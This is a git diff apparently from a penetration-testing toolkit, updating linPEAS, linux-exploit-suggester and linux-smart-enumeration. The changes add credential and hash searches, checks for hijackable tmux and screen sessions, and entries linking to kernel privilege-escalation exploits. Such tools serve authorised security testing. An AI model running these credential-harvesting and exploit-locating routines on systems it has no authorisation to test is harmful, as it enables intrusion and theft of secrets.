"`echo $CHECKS | grep IntFiles`" ]; then fi echo "" + if [ "$MACPEAS" ]; then + print_2title "Downloaded Files" + sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" + fi + ##-- IF) Web files print_2title "Web files?(output limit)" ls -alhR /var/www/ 2>/dev/null | head @@ -3140,7 +3594,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Readable files in /tmp, /var/tmp, bachups print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" - filstmpback=`find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70` + filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done echo "" @@ -3149,10 +3603,10 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=`find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500` + obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) printf "%s\n" "$obmowbe" | while read entry; do - if [ "`echo \"$entry\" | grep \"You_can_write_even_more_files_inside_last_directory\"`" ]; then printf $ITALIC"$entry\n"$NC; - elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -qE "$writeVB"; then echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," else echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," @@ -3165,12 +3619,12 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then if ! [ "$IAMROOT" ]; then print_2title "Interesting GROUP writable files (not in Home) (max 500)" print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - for g in `groups`; do - printf " Group "$GREEN"$g:\n"$NC; - iwfbg=`find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500` + for g in $(groups); do + printf " Group $GREEN$g:\n$NC"; + iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) printf "%s\n" "$iwfbg" | while read entry; do - if [ "`echo \"$entry\" | grep \"You_can_write_even_more_files_inside_last_directory\"`" ]; then printf $ITALIC"$entry\n"$NC; - elif [ "`echo \"$entry\" | grep -E \"$writeVB\"`" ]; then + if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; + elif echo "$entry" | grep -Eq "$writeVB"; then echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," else echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," @@ -3182,7 +3636,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Passwords in config PHP files print_2title "Searching passwords in config PHP files" - printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" $c 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done + printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done echo "" ##-- IF) TTY passwords @@ -3208,13 +3662,13 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Passwords files in home print_2title "Finding *password* or *credential* files in home (limit 70)" - (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found + (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | grep -v "/snap/" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found echo "" if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then ##-- IF) Find possible files with passwords print_2title "Finding passwords inside key folders (limit 70) - only PHP files" - intpwdfiles=`timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" $HOMESEARCH /var/www /usr/local/www/ $backup_folders_row /tmp /etc /root /mnt /Users /private 2>/dev/null` + intpwdfiles=$(timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$HOMESEARCH" /var/www /usr/local/www/ "$backup_folders_row" /tmp /etc /root /mnt /Users /private 2>/dev/null) printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g" echo "" @@ -3230,10 +3684,10 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Find possible conf files with passwords print_2title "Finding possible password in config files" - ppicf=`find $HOMESEARCH /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" 2>/dev/null` + ppicf=$(find "$HOMESEARCH" /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" 2>/dev/null) printf "%s\n" "$ppicf" | while read f; do - if [ "`grep -EiI 'passwd.*|creden.*' \"$f\" 2>/dev/null`" ]; then - echo $ITALIC" $f"$NC + if grep -qEiI 'passwd.*|creden.*' \"$f\" 2>/dev/null; then + echo "$ITALIC $f$NC" grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g" fi done @@ -3241,8 +3695,8 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then ##-- IF) Find possible files with usernames print_2title "Finding 'username' string inside key folders (limit 70)" - timeout 150 grep -RiIE "username.*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" - timeout 150 grep -RiIE "username.*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" + timeout 150 grep -RiIE "username.*[=:].+" "$HOMESEARCH" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" + timeout 150 grep -RiIE "username.*[=:].+" /var/www "$backup_folders_row" /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g" echo "" ##-- IF) Specific hashes inside files @@ -3256,7 +3710,7 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' - timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," + timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED}," echo "" fi @@ -3267,15 +3721,15 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' - timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," + timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc "$backup_folders_row" /tmp /var/tmp /var/www /root "$HOMESEARCH" /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," echo "" fi if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then ##-- IF) Find URIs with user:password@hoststrings print_2title "Finding URIs with user:password@host inside key folders" - timeout 150 find /var/www $backup_folders_row /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 150 grep -RiIE "://(.+):(.+)@" $HOMESEARCH 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 find /var/www "$backup_folders_row" /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" "$HOMESEARCH" 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" @@ -3283,4 +3737,4 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" echo "" fi -fi \ No newline at end of file +fi diff --git a/linux-exploit-suggester.sh b/linux-exploit-suggester.sh index b35ed0e..938c8e5 100755 --- a/linux-exploit-suggester.sh +++ b/linux-exploit-suggester.sh @@ -904,6 +904,32 @@ author: GRIMM EOF ) +EXPLOITS[((n++))]=$(cat <=5.7,ver<5.12,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1 +Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*} +Rank: 5 +analysis-url: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story +src-url: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main +Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1 +author: chompie1337 +EOF +) + +EXPLOITS[((n++))]=$(cat <=2.6.19,ver<=5.12-rc6 +Tags: ubuntu=20.04{kernel:5.8.0-*} +Rank: 1 +analysis-url: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html +src-url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c +ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c +Comments: ip_tables kernel module must be loaded +exploit-db: 50135 +author: theflow (orginal exploit author); bcoles (author of exploit update at 'ext-url') +EOF +) + ############ USERSPACE EXPLOITS ########################### n=0 diff --git a/lse.sh b/lse.sh index 04a0cdd..ffaa02f 100755 --- a/lse.sh +++ b/lse.sh @@ -5,7 +5,7 @@ # Author: Diego Blanco # GitHub: https://github.com/diego-treitos/linux-smart-enumeration # -lse_version="3.3" +lse_version="3.7" #( Colors # @@ -87,7 +87,7 @@ lse_procmon_data=`mktemp` lse_procmon_lock=`mktemp` # printf -printf "$reset" | grep -q '\\' && alias printf="env printf" +printf "%s" "$reset" | grep -q '\\' && alias printf="env printf" # internal data lse_common_setuid=" @@ -126,7 +126,9 @@ lse_common_setuid=" /usr/bin/newuidmap /usr/bin/passwd /usr/bin/pkexec +/usr/bin/pmount /usr/bin/procmail +/usr/bin/pumount /usr/bin/staprun /usr/bin/su /usr/bin/sudo @@ -148,13 +150,17 @@ lse_common_setuid=" /usr/lib/xorg/Xorg.wrap /usr/libexec/Xorg.wrap /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache +/usr/libexec/cockpit-session /usr/libexec/dbus-1/dbus-daemon-launch-helper /usr/libexec/gstreamer-1.0/gst-ptp-helper /usr/libexec/openssh/ssh-keysign /usr/libexec/polkit-1/polkit-agent-helper-1 +/usr/libexec/polkit-agent-helper-1 /usr/libexec/pt_chown /usr/libexec/qemu-bridge-helper +/usr/libexec/spice-client-glib-usb-acl-helper /usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper +/usr/local/share/panasonic/printer/bin/L_H0JDUCZAZ /usr/sbin/exim4 /usr/sbin/grub2-set-bootflag /usr/sbin/mount.nfs @@ -170,7 +176,7 @@ lse_common_setuid=" " #regex rules for common setuid lse_common_setuid="$lse_common_setuid -/snap/core/.* +/snap/core.* /var/tmp/mkinitramfs.* " #critical writable files @@ -798,6 +804,16 @@ lse_run_tests_filesystem() { "Are there possible credentials in any shell history file?" \ 'for h in .bash_history .history .histfile .zhistory; do [ -f "$lse_home/$h" ] && grep $lse_grep_opts -Ei "(user|username|login|pass|password|pw|credentials)[=: ][a-z0-9]+" "$lse_home/$h"; done' + #nfs exports with no_root_squash + lse_test "fst210" "0" \ + "Are there NFS exports with 'no_root_squash' option?" \ + 'grep $lse_grep_opts "no_root_squash" /etc/exports' + + #nfs exports with no_all_squash + lse_test "fst220" "1" \ + "Are there NFS exports with 'no_all_squash' option?" \ + 'grep $lse_grep_opts "no_all_squash" /etc/exports' + #files owned by user lse_test "fst500" "2" \ "Files owned by user '$lse_user'" \ @@ -816,7 +832,7 @@ lse_run_tests_filesystem() { #list nfs shares lse_test "fst530" "2" \ "List NFS server shares" \ - 'ls -la /etc/exports; cat /etc/exports' + 'ls -la /etc/exports 2>/dev/null && cat /etc/exports' #dump fstab lse_test "fst540" "2" \ @@ -1206,6 +1222,46 @@ lse_run_tests_software() { 'for f in $lse_user_writable; do test -S "$f" && printf "$f" | grep -a "gpg-agent"; done' \ "fst000" + #find keepass database files + lse_test "sof090" "0" \ + "Found any keepass database files?" \ + 'find / $lse_find_opts -regextype egrep -iregex ".*\.kdbx?" -readable -type f -print' + + #find pass database files + lse_test "sof100" "0" \ + "Found any 'pass' store directories?" \ + 'find / $lse_find_opts -name ".password-store" -readable -type d -print' + + #check if any tmux session is active + lse_test "sof110" "0" \ + "Are there any tmux sessions available?" \ + 'tmux list-sessions' + + #check for all tmux sessions for other users + lse_test "sof120" "1" \ + "Are there any tmux sessions from other users?" \ + 'find /tmp -type d -regex "/tmp/tmux-[0-9]+" ! -user $lse_user' + + #check if we have write access to other users tmux sessions + lse_test "sof130" "0" \ + "Can we write to tmux session sockets from other users?" \ + 'find /tmp -writable -type s -regex "/tmp/tmux-[0-9]+/.+" ! -user $lse_user -exec ls -l {} +' + + #check if there is any active screen session + lse_test "sof140" "0" \ + "Are any screen sessions available?" \ + 'screen -ls >/dev/null && screen -ls' + + #find other users screen sessions + lse_test "sof150" "1" \ + "Are there any screen sessions from other users?" \ + 'find /run/screen -type d -regex "/run/screen/S-.+" ! -user $lse_user' + + #find writable screen session sockets from other users + lse_test "sof160" "0" \ + "Can we write to screen session sockets from other users?" \ + 'find /run/screen -type s -writable -regex "/run/screen/S-.+/.+" ! -user $lse_user -exec ls -l {} +' + #sudo version - check to see if there are any known vulnerabilities with this lse_test "sof500" "2" \ "Sudo version" \ @@ -1225,6 +1281,17 @@ lse_run_tests_software() { lse_test "sof530" "2" \ "Apache version" \ 'apache2 -v; httpd -v' + + #check tmux version + lse_test "sof540" "2" \ + "Tmux version" \ + 'tmux -V' + + #check screen version + lse_test "sof550" "2" \ + "Screen version" \ + 'screen -v' + } diff --git a/template.py b/template.py index b8c1364..1507594 100755 --- a/template.py +++ b/template.py @@ -20,10 +20,9 @@ USERNAME = "admin" PASSWORD = "password" def login(username, password): - # Template method to create a session session = requests.Session() post_data = { "username": username, "password": password } - res = session.post(BASE_URL + "/login", data=post_data, allow_redirects=False) + res = session.post(f"{BASE_URL}/login", data=post_data, allow_redirects=False) if res.status_code != 302 or "Location" not in res.headers or res.headers["Location"] != "/home": print("Login failed") exit() diff --git a/update.sh b/update.sh index 7bd94ca..35f9a15 100755 --- a/update.sh +++ b/update.sh @@ -12,12 +12,6 @@ wget --no-verbose https://github.com/carlospolop/privilege-escalation-awesome-sc wget --no-verbose https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh -O LinEnum.sh wget --no-verbose https://github.com/stealthcopter/deepce/raw/main/deepce.sh -O deepce.sh -echo "Updating autorecon…" -wget --no-verbose https://raw.githubusercontent.com/Tib3rius/AutoRecon/master/src/autorecon/autorecon.py -O autorecon.py -wget --no-verbose https://github.com/Tib3rius/AutoRecon/raw/master/src/autorecon/config/global-patterns-default.toml -O autorecon_config/global-patterns.toml -wget --no-verbose https://github.com/Tib3rius/AutoRecon/raw/master/src/autorecon/config/port-scan-profiles-default.toml -O autorecon_config/port-scan-profiles.toml -wget --no-verbose https://github.com/Tib3rius/AutoRecon/raw/master/src/autorecon/config/service-scans-default.toml -O autorecon_config/service-scans.toml - echo "Updating Chisel…" location=$(curl -s -I https://github.com/jpillora/chisel/releases/latest | grep -i "location: " | awk '{ print $2 }') if [[ "$location" =~ ^https://github.com/jpillora/chisel/releases/tag/v(.*) ]]; then diff --git a/win/winPEAS.exe b/win/winPEAS.exe index 4b19fe0..c4f2eb6 100644 Binary files a/win/winPEAS.exe and b/win/winPEAS.exe differ diff --git a/win/winPEASx64.exe b/win/winPEASx64.exe index 860bb1d..cde6d03 100644 Binary files a/win/winPEASx64.exe and b/win/winPEASx64.exe differ